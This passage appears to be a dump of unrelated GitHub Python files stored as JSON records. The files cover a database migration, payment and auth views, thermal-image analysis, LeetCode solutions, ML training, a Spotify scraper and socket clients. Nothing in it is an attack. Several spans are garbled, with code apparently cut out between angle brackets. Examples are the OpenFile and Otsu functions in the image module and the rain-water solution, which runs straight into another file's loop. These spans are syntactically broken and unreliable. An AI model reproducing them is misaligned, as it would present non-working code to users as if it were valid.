See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Fixed constraint name.\n\nRevision ID: 54cc17accf2c\nRevises: 4fa888fd7eda\nCreate Date: 2015-05-28 16:44:32.936076\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '54cc17accf2c'\ndown_revision = '4fa888fd7eda'\n\nfrom alembic import op # noqa: E402\nimport sqlalchemy as sa # noqa: E402\n\n\ndef create_table(is_old=False):\n if is_old:\n constraints = ['uniq_field_mapping', 'uniq_service_mapping']\n else:\n constraints = ['uniq_field_threshold', 'uniq_service_threshold']\n table = op.create_table(\n 'tmig_hashmap_thresholds',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('threshold_id', sa.String(length=36), nullable=False),\n sa.Column('level', sa.Numeric(precision=20, scale=8), nullable=True),\n sa.Column('cost', sa.Numeric(precision=20, scale=8), nullable=False),\n sa.Column(\n 'map_type',\n sa.Enum('flat', 'rate', name='enum_map_type',\n create_constraint=True), nullable=False),\n sa.Column('service_id', sa.Integer(), nullable=True),\n sa.Column('field_id', sa.Integer(), nullable=True),\n sa.Column('group_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(\n ['field_id'],\n ['hashmap_fields.id'],\n ondelete='CASCADE'),\n sa.ForeignKeyConstraint(\n ['group_id'],\n ['hashmap_groups.id'],\n ondelete='SET NULL'),\n sa.ForeignKeyConstraint(\n ['service_id'],\n ['hashmap_services.id'],\n ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('threshold_id'),\n sa.UniqueConstraint('level', 'field_id', name=constraints[0]),\n sa.UniqueConstraint('level', 'service_id', name=constraints[1]))\n return table\n\n\ndef upgrade():\n dialect = op.get_context().dialect.name\n try:\n # Needs sqlalchemy 0.8\n if dialect != 'postgresql':\n with op.batch_alter_table('hashmap_thresholds') as batch_op:\n batch_op.drop_constraint(\n 'uniq_field_mapping',\n type_='unique')\n batch_op.drop_constraint(\n 'uniq_service_mapping',\n type_='unique')\n batch_op.create_unique_constraint(\n 'uniq_field_threshold',\n ['level', 'field_id'])\n batch_op.create_unique_constraint(\n 'uniq_service_threshold',\n ['level', 'service_id'])\n except AttributeError:\n # No support for batch operations\n if dialect == 'sqlite':\n new_table = create_table()\n sel = sa.sql.expression.select(new_table.columns.keys())\n op.execute(\n new_table.insert().from_select(\n new_table.columns.keys(),\n sel.select_from('hashmap_thresholds')))\n op.drop_table('hashmap_thresholds')\n op.rename_table('tmig_hashmap_thresholds', 'hashmap_thresholds')\n else:\n op.drop_constraint(\n 'uniq_field_mapping',\n 'hashmap_thresholds',\n type_='unique')\n op.drop_constraint(\n 'uniq_service_mapping',\n 'hashmap_thresholds',\n type_='unique')\n op.create_unique_constraint(\n 'uniq_field_threshold',\n 'hashmap_thresholds',\n ['level', 'field_id'])\n op.create_unique_constraint(\n 'uniq_service_threshold',\n 'hashmap_thresholds',\n ['level', 'service_id'])\n","repo_name":"openstack/cloudkitty","sub_path":"cloudkitty/rating/hash/db/sqlalchemy/alembic/versions/54cc17accf2c_fixed_constraint_name.py","file_name":"54cc17accf2c_fixed_constraint_name.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"53"} +{"seq_id":"26712946747","text":"from utilities.models import PendingPayments\nfrom utilities.payments.payment_probe import Utility\nfrom rest_framework import viewsets, status\nfrom rest_framework.views 
import APIView\nfrom rest_framework.response import Response\n# from swiftpay_backend.history.transactionhistory_utils import TransactionHistoryUtils\nfrom dotenv import load_dotenv\nfrom ..services.cableservice import CableSubscriptionService\nfrom .helpers import getnumberfromstring\nimport os, uuid\nload_dotenv()\nops = os.getenv(\"OPS\")\nusername = os.getenv(\"API_USERNAME\")\napi_password = os.getenv(\"API_PASSWORD\")\n\nclass CableTvSubscription(APIView):\n \n def process_data_vending(self,data):\n self.cablesubscriptionservice = CableSubscriptionService()\n response = self.cablesubscriptionservice.cableRoutine(data)\n \n if response['code']=='success' :\n # Overide request data with response data\n data['amount'] = str(float(getnumberfromstring(response['data']['amount_charged'])[0]))\n data['phonenumber'] = response['data']['phone']\n data['provider'] = data['provider'] #response['data']['cable_tv'] uncomment for live testing\n data['recipient'] = response['data']['smartcard_number']\n data['bouquet'] = data['servicename'] #\n \n data['status'] = response['code']\n # self.transactionhistoryutils = TransactionHistoryUtils(None,None,None,data,'cable')\n return Response({\"status\": True, \"data\": response['message']}, status=status.HTTP_200_OK)\n else:\n data['status'] = response['code']\n # self.transactionhistoryutils = TransactionHistoryUtils(None,None,None,data,'data')\n return Response({\"status\": False, \"message\": response['message']})\n \n def confirm_payment(self,data):\n self.utility = Utility()\n return self.utility.verifyWithPaystack(data['transaction']['reference'])\n \n def post(self, request):\n try:\n data=request.data\n # data['paid'] = False\n # data['transaction']['reference'] = 'XXXXXXXXXXXXXXXXXXXX'\n if data.get('paid'):\n return self.process_data_vending(data)\n else:\n if not self.confirm_payment(data):\n new_data = {}\n new_data['_type'] = 'cable'\n new_data['order_ref'] = 'OC-'+ str(uuid.uuid4())\n new_data['phone'] = data['phonenumber']\n new_data['service_request'] = data\n PendingPayments.objects.create(**new_data)\n return Response({\"status\": False, \"message\": \"Your payments is pending, please do not retry this transaction!\", 'data':new_data['order_ref']}, status=status.HTTP_202_ACCEPTED)\n else:\n return self.process_data_vending(data)\n \n except Exception as e:\n return Response({\"status\": False, \"data\": str(e)})\n \n \n","repo_name":"Pybool/Quickee","sub_path":"escrow-backend/utilities/views/cablesubscription_view.py","file_name":"cablesubscription_view.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10810619012","text":"##############################################################\n# #\n# Project: Design of real-time processing algorithms for #\n# biomedical images to be implemented in the #\n# Raspberry Pi platform #\n# Author: Rubén Padial Allué #\n# mail: rubpadall@alum.us.es #\n# Admisor: Juan Antonio Leñero Bardallo #\n# Date: 07-09-2020 #\n##############################################################\n\nimport struct\nimport numpy as np\nimport math\nimport scipy \nimport matplotlib.pyplot as plt\n\nfrom skimage import data\nfrom skimage import filters\nfrom skimage import exposure\nfrom skimage import measure\n##########################################################################################\n# DEFINES #\n##########################################################################################\n# Sobel-Feldman 
operator\nK = np.array([ [47, 0, -47],\n [162, 0, -162], \n [47, 0, -47]\n ])\n\n# \nu = np.array([1, 2, 1])\n\n'''\nT2=36.8\nT1=36.6\n\nR1=8250\nR2=8300\n\n'''\nT2=37.1;\nT1=36.0;\n\nR1=8250;\nR2=8400;\n\nM=80\nN=60\n##########################################################################################\n# END DEFINES #\n##########################################################################################\n\n##########################################################################################\n# OpenFile: Open 'finput' .bin file packaged and return a list 'L'. Data packaged is \n# unsigned-sorts little-endian.\n# Parameters:\n# - finput: input file.\n# Return:\n# - L: List with with the filedata.\n##########################################################################################\n\ndef OpenFile(finput):\n #reading unsigned shorts 'tuple'??\n with open(finput, \"rb\") as fid:\n #Max = struct.unpack('H', fid.read(2)) # 0:\n G[i,j]=G[i,j]/MaxVal#*(MaxVar/MaxVal)\n else:\n G[i,j]=-G[i,j]/MinVal#*(MaxVar/MinVal)\n\n return G\n\n##########################################################################################\n#SOBELKERNEL returns sobel kernel\n# KERNEL=SOBELKERNEL(SIZE) Returns Sobel filter of predefined size.\n#\n# KERNEL=SOBELKERNEL(SIZE, 'NORMALISED') The Sobel matrix should be\n# normalised if proper derivative estimator is required.\n#\n# [KERNEL, S, D]=SOBELKERNEL(SIZE, 'NORMALISED') Returns also smoothing S\n# and derivative D components individually. The kernel is then a\n# multiplication of these two vectors: S'*D. This can be usefull for\n# convolution acceleration via separable kernels as illustrated at:\n# http://blogs.mathworks.com/steve/2006/10/04/separable-convolution/\n# \n# Example\n# -------\n# sobelkernel(4)\n#\n# See also IMFILTER, FSPECIAL.\n# Contributed by Jan Motl (jan@motl.us)\n# $Revision: 1.1 $ $Date: 2013/02/13 16:58:01 $\n# For method description see:\n# http://stackoverflow.com/questions/9567882/sobel-filter-kernel-of-large-size\n# Parameter checking.\n##########################################################################################\ndef sobelkernel(size, varargin=[]):\n # Parameter checking.\n if (len(varargin)!=0) and (varargin == 'normalise'):\n normalisation = 1/8\n else:\n normalisation = 1\n \n # The dafault 3x3 Sobel kernel.\n s = normalisation * u;\n d = np.array([1, 0, -1])\n\n # Convolve the default 3x3 kernel to the desired size.\n for i in range(0, size-3):\n s = normalisation * np.convolve(u, s,)\n d = np.convolve(u, d)\n #kernel = np.dot(x,d);\n \n kernel = np.zeros((s.shape[0],d.shape[0]))\n\n for i in range(0, s.shape[0]):\n for j in range(0, d.shape[0]):\n kernel[i,j]=s[i]*d[j]\n \n return kernel\n\n##########################################################################################\n# Otsu: Otsu method for image segmentation\n# Parameters:\n# - IM: orginal image\n# - thr: threshold 'lower'/'upper' remove value below/upper the threshold.\n# Return:\n# - IMOtsu: Image segmented. 
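\n# Usage sketch (illustrative, assumed from the description above):\n#     seg = Otsu(IM)            # 'lower': values below the Otsu threshold are floored to min(IM)\n#     seg = Otsu(IM, 'upper')   # 'upper': values above the threshold are removed instead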
\n##########################################################################################\ndef Otsu (IM, thr=\"lower\"): \n val = filters.threshold_otsu(IM)\n #hist, bins_center = exposure.histogram(IM)\n N = IM.shape[0] # number of rows\n M = IM.shape[1] # number of columns\n \n #IMOtsu = IM\n IMOtsu = IM.copy()\n MinVal = math.floor(np.amin(IM))\n MaxVal = math.ceil(np.amax(IM))\n \n if (thr == \"lower\"): \n for i in range(0,N):\n for j in range(0,M):\n if (IMOtsu[i,j]val):\n IMOtsu[i,j]=MinVal\n \n \n return IMOtsu\n \n'''\ndef StartIsocurve(x, y, Tittle, ColorMap):\n #global app, win2, vb\n cmap = plt.get_cmap(ColorMap)\n ## Always start by initializing Qt (only once per application)\n app = pg.mkQApp()\n #win = QtGui.QMainWindow()\n # container widget with a layout to add QWidgets to\n\n # win.show()\n ####\n win2 = pg.GraphicsWindow()\n win2.setWindowTitle(Tittle)\n vb = win2.addViewBox()\n win2.resize(x,y)\n return vb'''\n\n##########################################################################################\n# CoordinateMethods: Area calculation with cordinatemethos\n# Parameters:\n# - xi: array with x coordinates of a isocurve\n# - yi: array with y coordinates of a isocurve\n# Return:\n# - Area: area behind the curve. \n##########################################################################################\ndef CoordinateMethods(xi, yi):\n S1 = xi[1]*yi[1+1]\n S2 = xi[1+1]*yi[1]\n for i in range (0, xi.shape[0]-1):\n S1 = S1 + xi[i]*yi[i+1]\n S2 = S2 + xi[i+1]*yi[i]\n\n Area = abs(S1-S2)/2\n\n return Area\n\n##########################################################################################\n# SiftingArea: Select the array with the maximum number of elements. Filter the greatest \n# area\n# Parameters:\n# - Arrays: Array with coodinates\n# Return:\n# - max_index: index of the larger array.\n##########################################################################################\ndef SiftingArea(Arrays):\n size_Arrays = np.shape(Arrays)\n #print('shape = ', size_Arrays[0])\n n_Arrays = np.zeros(size_Arrays[0])\n\n for i in range(size_Arrays[0]):\n Array_x = Arrays[i]\n n_Arrays [i] = Array_x.shape[0]\n \n max_index = np.where(n_Arrays==(np.max(n_Arrays)))\n max_index = (np.asarray(max_index[0]))\n np.reshape(max_index,max_index.shape[0],'C')\n return int(max_index)\n\n##########################################################################################\n# ReqArea: Calculate the area behind a temperature line. \n# Parameters:\n# - IM: Temperetature image array. \n# - level: Number of levels to be plotted. \n# - AreaType: Default Value = 'sum'.\n# -- 'sum' caculates de sum of all the areas.\n# -- 'greater' calculates the area of the grater region. \n# Return:\n# - Area: Number of pixels with level temperature or greater. 
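\n# Usage sketch (illustrative, assumed): for a temperature image IM,\n#     ReqArea(IM, 37.0)             # sums the areas enclosed by every 37.0-degree isocontour\n#     ReqArea(IM, 37.0, 'greater')  # area of the single largest 37.0-degree region only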
\n##########################################################################################\ndef ReqArea(IM, level, AreaType='sum'):\n Area = 0\n if (level < np.amin(IM) or level > np.amax(IM)):\n return 0\n else:\n ContourCordinates = measure.find_contours(IM, level) #Retunrs (row, column) array\n #↨ContourCordinates = ContourCordinates[(SiftingArea(ContourCordinates))]\n size_contour = np.shape(ContourCordinates)\n CC = np.zeros(size_contour[0])\n\n if (AreaType == \"sum\"):\n for i in range(size_contour[0]):\n A = ContourCordinates[i]\n\n Area = Area + CoordinateMethods(A[:,1], A[:,0]) # xi = column, yi =row\n elif (AreaType == \"greater\"):\n SiftingArea(ContourCordinates)\n A = ContourCordinates[SiftingArea(ContourCordinates)]\n Area = CoordinateMethods(A[:,1], A[:,0])\n \n return Area\n\n##########################################################################################\n# PlotIsocurve: Plots nlevels isocurves from min to max value. \n# Parameters:\n# - IM: Temperetature image array. \n# - nlevels: Number of levels to be plotted. \n# - ShowImage: 'Tue' plots grey image below isocurves. Default Value = 'False\".\n# Return:\n# - Nothing\n##########################################################################################\ndef PlotIsocurve(IM, nlevels, ShowImage = 'False'):\n global fig\n\n fig = plt.figure(\"Isoterm\")\n ax = fig.add_subplot(111)\n\n\n if ShowImage == 'True':\n ax.imshow(IM, cmap='Greys')\n\n cont = plt.subplot()\n cs = cont.contour(IM, nlevels, origin='lower')\n ax.clabel(cs)\n\n plt.show()\n\n##########################################################################################\n# CloseIsocurves: Close isocurves figure.\n# Parameters:\n# - Fig: Figure ID. \n# Return:\n# - Nothing\n##########################################################################################\ndef CloseIsocurves(Fig): \n plt.close(Fig)\n\n##########################################################################################\n# PlotRegion: Plots contour line.\n# Parameters:\n# - IM: Temperature image array.\n# - level: Temperature to be plotted. \n# - ShowImage: Default value = 'False'.\n# - AreaType: DefaultValue 'sum'\n# -- \"sum\" all the areas. \n# -- \"greater\" grater region. \n# Return:\n# - Nothing\n##########################################################################################\ndef PlotRegion(IM, level, ShowImage = 'False', AreaType='sum'):\n global figure\n contours = measure.find_contours(IM, level)\n # Display the image and plot all contours found\n figure, ax = plt.subplots()\n if ShowImage == 'True':\n ax.imshow(IM, cmap=plt.cm.gray)\n\n\n if (AreaType==\"sum\"):\n for n, contour in enumerate(contours):\n ax.plot(contour[:, 1], contour[:, 0], linewidth=2)\n elif (AreaType==\"greater\"):\n contours = contours[(SiftingArea(contours))]\n ax.plot(contours[:, 1], contours[:, 0], linewidth=2) \n\n ax.axis('image')\n ax.set_xticks([])\n ax.set_yticks([])\n plt.show()\n","repo_name":"RPadial/SCC","sub_path":"SCC.py","file_name":"SCC.py","file_ext":"py","file_size_in_byte":17443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74031884327","text":"\"\"\"\n5. Longest Palindromic Substring\n\nGiven a string s, find the longest palindromic substring in s. 
You may assume that the maximum length of s is 1000.\n\nExample 1:\n\nInput: \"babad\"\nOutput: \"bab\"\nNote: \"aba\" is also a valid answer.\nExample 2:\n\nInput: \"cbbd\"\nOutput: \"bb\"\n\"\"\"\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n start, end = 0, 0\n for i in range(len(s)):\n cur_len = max(self.expand(s, i, i), self.expand(s, i, i + 1))\n if cur_len > end - start:\n start = i - (cur_len - 1) // 2 # remember to -1 since it could expand at center of two char\n end = i + cur_len // 2\n return s[start:end + 1]\n\n def expand(self, s, left, right):\n l, r = left, right\n while l >= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n return r - l - 1\n","repo_name":"chauncyf/leetcode","sub_path":"Python/longest_palindromic_substring.py","file_name":"longest_palindromic_substring.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16631044634","text":"import datetime\nimport os\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom sys import platform\n\n# number of epochs: how many times do you want\n# to pass the same batch size to train\n# total batch size = total train prediction size\nCHECKPOINT_PATH = 'training/model_{accuracy}.hdf5'\nCHECKPOINT_DIR = os.path.dirname(CHECKPOINT_PATH)\nMODEL_WEIGHT_FILENAME = 'christopher_model.hdf5'\n\n\ndef visualise_history(history):\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n\n # Retrieve a list of list results on training and validation prediction\n # sets for each training epoch\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n # Get number of epochs\n epochs = range(len(acc))\n\n # Plot training and validation accuracy per epoch\n plt.plot(epochs, acc)\n plt.plot(epochs, val_acc)\n plt.title('Training and validation accuracy')\n\n plt.figure()\n\n # Plot training and validation loss per epoch\n plt.plot(epochs, loss)\n plt.plot(epochs, val_loss)\n plt.title('Training and validation loss')\n plt.show()\n\n\nclass ModelTrainer:\n def __init__(self,\n train_data_gen,\n steps_per_epoch,\n epochs,\n validation_gen,\n validation_steps,\n model):\n self.train_data_gen = train_data_gen\n self.steps_per_epoch = steps_per_epoch\n self.epochs = epochs\n self.validation_gen = validation_gen\n self.validation_steps = validation_steps\n self.model = model\n\n def load_model_weights(self):\n self.model = tf.keras.model.load_model(MODEL_WEIGHT_FILENAME)\n print('model successfully loaded!')\n self.model.summary()\n\n def train_model(self):\n cp_callback = tf.keras.callbacks.ModelCheckpoint(CHECKPOINT_PATH,\n save_best_only=True)\n if not (os.path.isdir('./logs')):\n os.mkdir('./logs')\n\n # Checking OS for TensorBoard compatibility\n if platform == \"darwin\":\n print('os: OSX detected..')\n if not os.path.isdir('./logs/osx'):\n os.mkdir('./logs/osx')\n tb_log = 'logs/osx'\n elif platform == 'win32':\n print('os: Windows detected..')\n tb_log = \"logs\\\\fit\\\\\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tb_callback = TensorBoard(log_dir=tb_log,\n histogram_freq=1,\n write_graph=True,\n write_images=True)\n tb_callback.set_model(self.model)\n\n if os.path.isfile(MODEL_WEIGHT_FILENAME):\n self.model.load_weights(MODEL_WEIGHT_FILENAME)\n\n history = self.model.fit_generator(\n self.train_data_gen,\n steps_per_epoch=self.steps_per_epoch,\n epochs=self.epochs,\n 
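# note: fit_generator is deprecated in recent TensorFlow (2.1+); plain model.fit accepts generators directly\n            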
validation_data=self.validation_gen,\n validation_steps=self.validation_steps,\n callbacks=[tb_callback],\n )\n self.model.save(MODEL_WEIGHT_FILENAME)\n print('model weights saved!')\n return history\n\n\n\n","repo_name":"nordic96/Christopher_Image_Classifier","sub_path":"trainer/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3703262451","text":"from rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.authtoken.views import ObtainAuthToken\r\nfrom rest_framework.authtoken.models import Token\r\nfrom rest_framework import status\r\nfrom account.api.serializers import RegistrationSerializer\r\nfrom datetime import datetime\r\n\r\n# Returns the token if valid email and password is provided\r\nclass Login(ObtainAuthToken):\r\n\r\n def post(self, request, *args, **kwargs):\r\n serializer = self.serializer_class(data=request.data, context={'request': request})\r\n serializer.is_valid(raise_exception=True)\r\n account = serializer.validated_data['user'] # Get the user\r\n Token.objects.get(user=account).delete() # Delete the old token\r\n token = Token.objects.create(user=account) # Create a new token\r\n data = {\r\n 'token': token.key,\r\n 'user_id': account.pk,\r\n 'email': account.email\r\n }\r\n account.last_login = datetime.now() # Update last_login\r\n account.save()\r\n return Response(data)\r\n\r\n# Requires email, password, password2\r\nclass Register(APIView):\r\n\r\n def post(self, request):\r\n serializer = RegistrationSerializer(data=request.data)\r\n data = {} # This is what we'll return to the view\r\n if serializer.is_valid():\r\n account = serializer.save()\r\n data['email'] = account.email\r\n data['user_id'] = account.pk\r\n token = Token.objects.get(user=account)\r\n data['token'] = token.key\r\n else:\r\n # If the serializer throws any errors, return the error\r\n data = serializer.errors\r\n return Response(data=data, status=status.HTTP_201_CREATED)\r\n","repo_name":"maxitron93/quora_clone","sub_path":"account/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15916263264","text":"import os\nfrom htm.bindings.engine_internal import Network as BaseNetwork\n\nfrom pandaBaker.pandaBaker import PandaBaker\nfrom pandaBaker.dataStructs import cDataStream\n\nBAKE_DATABASE_FILE_PATH = os.path.join(os.getcwd(), 'bakedDatabase', 'pandaVis.db')\n\nclass Network(BaseNetwork):\n def __init__(self):\n self.firstRun = True\n self.bakePandaData = True\n self.pandaBaker = PandaBaker(BAKE_DATABASE_FILE_PATH)\n self.iteration = 0\n\n self.updateDataStreams = None # callback for user method\n self.verbose = False\n\n super().__init__()\n\n def run(self, n):\n if not self.bakePandaData:\n super().run(n) # if not baking, just run as normal\n self.iteration += n\n return\n if self.verbose == True:\n print(\"Iteration \"+str(self.iteration)+\" running \"+str(n)+\"x\")\n for i in range(n):\n super().run(1)\n if self.firstRun:\n self.FirstRun()\n\n if self.updateDataStreams is not None: # call callback to user app to fill in data to dashStreams\n self.updateDataStreams()\n\n self.pandaBaker.StoreIteration(self, self.iteration)\n\n self.iteration += 1\n self.pandaBaker.CommitBatch() # called too often? 
performance issue?\n\n def FirstRun(self):\n print(\"first run\")\n self.firstRun = False\n\n structure = {}\n regions = {}\n links = {}\n\n structure[\"regions\"] = regions\n structure[\"links\"] = links\n\n regionTypes = \"\"\n for region in self.getRegions():\n regionTypes += \",\" + str(region[1].getType())\n regions[region[0]] = [region[1].getType(), region[1]]\n\n print(\"There are these types of regions in the network:\"+regionTypes)\n i = 0\n for l in self.getLinks():\n links[i] = [l.getSrcRegionName(), l.getSrcOutputName(), l.getDestRegionName(), l.getDestInputName()]\n\n i = i+1\n\n self.pandaBaker.PrepareDatabase(structure)\n\n def UpdateDataStream(self, name, value):\n if name not in self.pandaBaker.dataStreams:\n self.pandaBaker.CreateDataStream(name, cDataStream())\n\n self.pandaBaker.dataStreams[name].value = value # assign value\n\n\n\n","repo_name":"htm-community/HTMpandaVis","sub_path":"pandaBaker/pandaNetwork.py","file_name":"pandaNetwork.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"23332980575","text":"# Clase creada para extraer datos de las canciones \n\nfrom api_spotify import configuration_API_Spotify\nimport pandas as pd\nimport numpy as np\nimport os \nimport time\nimport spotipy\nimport configparser\nfrom spotipy.oauth2 import SpotifyClientCredentials\n\n\n\ndef get_PATH_URL():\n carpeta_padre = os.path.dirname(os.getcwd())\n return carpeta_padre\n\n\n\ndef __init_songs__():\n \n # Abrir archivo dataframe con información de los albumes\n PATH_URL = os.path.join(get_PATH_URL(), 'Data', 'dataframe_albums.pkl')\n df_album = pd.read_pickle(PATH_URL)\n\n \n array_songs = []\n ruta_config = os.path.join(get_PATH_URL(), 'Backend/Tokens', 'tokens.ini')\n\n if not os.path.exists(ruta_config):\n raise FileNotFoundError(f\"El archivo config.ini no se encuentra en la ruta: {ruta_config}\")\n \n # Conectar la API de Spotify para extraer audiofeatures\n sp = configuration_API_Spotify(ruta_config)\n\n \n # Crear DataFrame para las canciones\n\n songs_id = [] \n # id,duration_ms, danceability, energy, loudness, valence\n audio_features_df = []\n cont = 1\n cont_album = 0\n \n \n for id_album in df_album['id']:\n for song in sp.album_tracks(id_album)['items']:\n try:\n audio_features = sp.audio_features(song['uri'])[0]\n songs_id.append(audio_features['id'])\n audio_features_df.append([song['name'],audio_features['duration_ms'],audio_features['danceability'],audio_features['energy'],audio_features['loudness'],audio_features['valence']])\n \n except:\n # Guardar temp\n df_songs = pd.DataFrame(columns = ['id','duration_ms','danceability','energy','loudness','valence'],data = audio_features_df,index = songs_id)\n df_songs.to_pickle(os.path.join(get_PATH_URL(), 'Data', 'dataframe_songs.pkl'))\n\n time.sleep(30)\n pass\n\n cont_album += 1\n\n df_songs = pd.DataFrame(columns = ['id','duration_ms','danceability','energy','loudness','valence'],data = audio_features_df,index = songs_id)\n \n print(df_songs) \n \n df_songs.to_pickle(os.path.join(get_PATH_URL(), 'Data', 'dataframe_songs.pkl'))\n\n# Open df songs\nPATH_URL = os.path.join(get_PATH_URL(), 'Data', 'dataframe_albums.pkl')\ndf_album = pd.read_pickle(PATH_URL)\n\nprint(df_album['tracks'].iloc[0])\n\n\n# Nombre de artista y canción\n # Nombre del artista y canción -> Donde la letra no este en 
Spotify\n\n","repo_name":"MateoG404/IA_SpotifyLyrics","sub_path":"Backend/songs.py","file_name":"songs.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"2071616113","text":"#Method 1, O(n), 32ms DECREASING Mono Queue\n#Similar to LC84 Largest Area in Histogram, which stores increasing bars in a stack, then calculates the area\n#This solution uses a stack to save decreasing (incl. equal) bars, and then calculates the area/water fill.\nclass Solution(object):\n def trap(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n \n if len(height)<3: \n return 0\n \n #use stack to store the indices with decreasing wall heights (including equal)\n stack, water = [], 0\n \n for i, h in enumerate(height):\n while stack and h > height[stack[-1]]:\n bottom = stack.pop()\n if stack:\n level = min(h, height[stack[-1]]) - height[bottom]\n water += level *(i - stack[-1] -1)\n stack.append(i)\n return water\n\n\n#Method 2, O(n), 28ms\n#Start from two ends, the water level of each location depends on min(leftMax, rightMax)\nclass Solution(object):\n def trap(self, height):\n \n if len(height)<3: \n return 0\n \n l, r = 0, len(height)-1\n leftMax = height[l]\n rightMax = height[r]\n water = 0\n while l 0:\n result += 1\n\n file.close()\n return result\n\nif __name__ == '__main__':\n #print(sys.argv)\n if len(sys.argv) < 2:\n print(\"An input file argument is required\")\n sys.exit(1)\n input_file_name = str(sys.argv[1])\n print(CountMissingDataRows(input_file_name))","repo_name":"vohieu00/PreProcessing","sub_path":"CountMissingDataRows.py","file_name":"CountMissingDataRows.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38305356534","text":"import socket\n\ndef main():\n print('\\n-----START-----')\n\n send_msg = \"356a192b7913b04c54574d18c28d46e6395428a1\"\n\n sock = socket.socket()\n try:\n sock.connect((\"127.0.0.1\", 4000))\n except ConnectionRefusedError:\n raise # re-raise the original exception with its traceback\n\n sock.send(send_msg.encode())\n print(\"\\nSEND {}\".format(send_msg))\n\n receive_msg = sock.recv(1024).decode()\n print(\"\\nRECEIVE {}\".format(receive_msg))\n\n sock.close()\n\nif __name__ == '__main__':\n main()","repo_name":"childhoodisend/astra","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14491518213","text":"import re\n\nips = [re.findall(r\"\\[?[a-z]+\\]?\", x) for x in open(\"input.txt\").readlines()]\n\ndef hasMatchingBAB(ip, aba):\n babSource = \"\".join([i for i in ip if \"[\" in i])\n for a in aba:\n if a[1]+a[0]+a[1] in babSource:\n return True\n return False\n\ndef extractABA(ip):\n aba = set()\n for i in ip:\n if \"[\" in i:\n continue\n\n for a,b,c in zip(i, i[1:], i[2:]):\n if a == c and a != b:\n aba.add(a+b+c)\n\n return aba\n\nno = 0\nfor ip in ips:\n aba = extractABA(ip)\n if hasMatchingBAB(ip, aba):\n no += 1\n\nprint(no)","repo_name":"pepperbob/adventofcode","sub_path":"2016/no7/solution-2.py","file_name":"solution-2.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70663684648","text":"import socket\nfrom urllib.parse import urlparse\nimport re\nimport sys\nimport ssl\n# host = 'me.utm.md'\nprint(\"port %s\" % (sys.argv[1]))\nprint(\"host %s\" % 
(sys.argv[2]))\nprint(\"link %s\" % (sys.argv[3]))\nprint(\"filename %s\" % (sys.argv[4]))\nport = int((sys.argv[1]))\nhost = (sys.argv[2])\nlink = (sys.argv[3])\nfilename = (sys.argv[4])\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nif port == 443:\n context = ssl.create_default_context()\n sock = context.wrap_socket(sock, server_hostname=host)\nserver_address = (host, port)\nsock.connect(server_address)\nurl = urlparse(link)\nrequest = \"GET {} HTTP/1.0\\r\\nHost: {}\\r\\n\\r\\n\".format(url.path, host)\nsock.send(request.encode())\nresponse = sock.recv(1024)\nheaders, image_data = response.split(b\"\\r\\n\\r\\n\", 1)\n\ncontent_length_match = re.search(r'content-length:\\s*(\\d+)', headers.decode().lower())\ncontent_length = int(content_length_match.group(1))\n\nwhile len(image_data) < content_length:\n image_data += sock.recv(1024)\n\nwith open(\"images/\"+filename, \"wb\") as f:\n f.write(image_data)\n f.close()\nsock.close()","repo_name":"danielcode2020/programare_retea","sub_path":"images/py/amain.py","file_name":"amain.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38902213690","text":"# -*- coding: utf-8 -*-\n# @Author : uni_kevin(可乐)\nimport json\n\nimport mod.server.extraServerApi as serverApi\nimport apolloCommon.commonNetgameApi as commonNetgameApi\nimport serverhttp\n\nServerSystem = serverApi.GetServerSystemCls()\nEngineNamespace = serverApi.GetEngineNamespace()\nEngineSystemName = serverApi.GetEngineSystemName()\n\n# noinspection SqlResolve\nclass HziAuthApi(ServerSystem):\n\n def __init__(self, namespace, systemName):\n ServerSystem.__init__(self, namespace, systemName)\n config = commonNetgameApi.GetModJsonConfig('hziAuthScript')\n self.apiHost = config['database_host']\n\n @staticmethod\n def IsPlayerBindPhone(uid):\n system = serverApi.GetSystem('HziAuth', 